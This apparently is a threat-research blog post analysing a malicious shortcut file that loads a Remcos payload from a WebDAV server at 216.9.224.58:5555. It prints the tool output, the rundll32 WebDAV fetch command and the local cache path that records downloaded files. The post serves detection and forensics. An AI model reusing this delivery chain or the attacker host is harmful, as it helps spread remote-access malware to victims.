Today I Learned - WebDAV Cache

Table of Contents

Introduction

User @karol_paciorek recently tweeted about an open directory containing malware, depicted in Figure 1. You can find the original post here:

opendir: 216.9.224[.]58:5555

Figure 1: opendir: 216.9.224[.]58:5555

Along with the MS_calendar.lnk file mentioned in the tweet from @karol_paciorek, there are additional files publicly available on that server:

LNK Analysis

We will examine the LNK file schedule.lnk (MD5: 62d5389d43931237e9d3d1aa77c87483), located in the same directory as the MS_calendar.lnk file. To analyze it, we will use LECMD.exe, a handy tool developed by Eric Zimmermann.

C:\Users\malmoeb\Downloads>LECmd.exe -f schedule.lnk
LECmd version 1.5.0.0

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/LECmd

Command line: -f schedule.lnk

Processing C:\Users\malmoeb\Downloads\schedule.lnk

Source file: C:\Users\malmoeb\Downloads\schedule.lnk
  Source created:  2024-08-06 07:51:47
  Source modified: 2024-08-06 07:51:47
  Source accessed: 2024-08-06 07:52:08

--- Header ---
  Target created:  2024-08-04 23:17:22
  Target modified: 2024-07-01 03:33:05
  Target accessed: 2024-07-01 03:33:05

  File size (bytes): 101,888
  Flags: HasLinkInfo, HasRelativePath, HasWorkingDir, HasIconLocation, IsUnicode, HasExpString, EnableTargetMetadata
  File attributes: FileAttributeArchive
  Icon index: 0
  Show window: SwShowminnoactive (Display the window as minimized without activating it.)

Relative Path: .\Erlianaw.exe
Working Directory: \\216.9.224.58@5555\DavWWWRoot\files
Icon Location: \\216.9.224.58@5555\DavWWWRoot\files\fold.ico

--- Link information ---
Flags: CommonNetworkRelativeLinkAndPathSuffix

  Network share information
    Share name: \\216.9.224.58@5555\DAVWWWROOT
    Provider type: WnncNetDav
    Share flags: ValidNetType

  Common path: files\Erlianaw.exe

--- Extra blocks information ---

>> Property store data block (Format: GUID\ID Description ==> Value)
   dabd30ed-0043-4789-a7f8-d013a4736622\100    Item Folder Path Display Narrow     ==> files (\\216.9.224.58@5555\DavWWWRoot)
   b725f130-47ef-101a-a5f1-02608c9eebac\10     Item Name Display                   ==> Erlianaw.exe
   b725f130-47ef-101a-a5f1-02608c9eebac\15     Date Created                        ==> 08/04/2024 23:17:22
   b725f130-47ef-101a-a5f1-02608c9eebac\12     Size                                ==> 101888
   b725f130-47ef-101a-a5f1-02608c9eebac\4      Item Type Text                      ==> Application
   b725f130-47ef-101a-a5f1-02608c9eebac\14     Date Modified                       ==> 07/01/2024 03:33:05
   28636aa6-953d-11d2-b5d6-00c04fd918d0\30     Parsing Path                        ==> \\216.9.224.58@5555\DavWWWRoot\files\Erlianaw.exe

By analyzing this LNK file (the full output from LECmd.exe is depicted above), we can identify the next stage in the infection chain that would be downloaded to the victim host upon executing this LNK file:

Relative Path: .\Erlianaw.exe
Working Directory: \\216.9.224.58@5555\DavWWWRoot\files

WebDAV Connection

As already explained in an earlier blog post (Abusing the “search-ms” URI protocol handler), WebDAV connections are carried out via a DLL that is started with rundll32.exe:

CommandLine: 
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 
216.9.224.58@5555 http://216.9.224.58:5555/

The user agent utilized for this WebDAV connection is noteworthy:

User-Agent for the WebDAV connection

Figure 2: User-Agent for the WebDAV connection

Didier Stevens described and investigated this user agent years ago. For organizations proxying their traffic, you might want to monitor this user agent.

Sysmon

While analyzing the Sysmon logs, I stumbled upon something interesting.

Event 11 - Sysmon File Create

Figure 3: Event 11 - Sysmon File Create

File created:

TargetFilename: 
C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\TfsStore\Tfs_DAV\{CACAF1F7-CE7C-4CA2-B9E3-ABBC9F6E965D}.exe

What the heck is this \TfsStore\Tfs_DAV\ directory and the executable {CACAF1F7-CE7C-4CA2-B9E3-ABBC9F6E965D}.exe in it? As it turns out, these files could provide evidence of files retrieved from remote WebDav server(s) to the local system, at least temporarily.

Tfs_DAV

Tfs_DAV folde

Figure 4: Tfs_DAV folder

And sure enough, the MD5 of the file {CACAF1F7-CE7C-4CA2-B9E3-ABBC9F6E965D}.exe maps to a file on VirusTotal named Erlianaw.exe, the filename we saw earlier during the analysis of the LNK file.

Erlianaw.exe - Remcos on VirusTotal

Figure 5: Erlianaw.exe - Remcos on VirusTotal

Late to the party

It looks like I’m late to the party, though :) @enigma0x3 already discussed in 2017 that files executed via WebDAV are copied locally to TfsStore\Tfs_DAV folder.

And, another interesting fact, @SBousseaden mentioned that .url files in the AppData\Local\Temp\TfsStore\Tfs_DAV cache folder might contain the URL from where the downloaded files come from (referencing CVE_2024_21412).

Once again, standing on the shoulds of giants.


What I learned today: Short blog posts about novel information for me.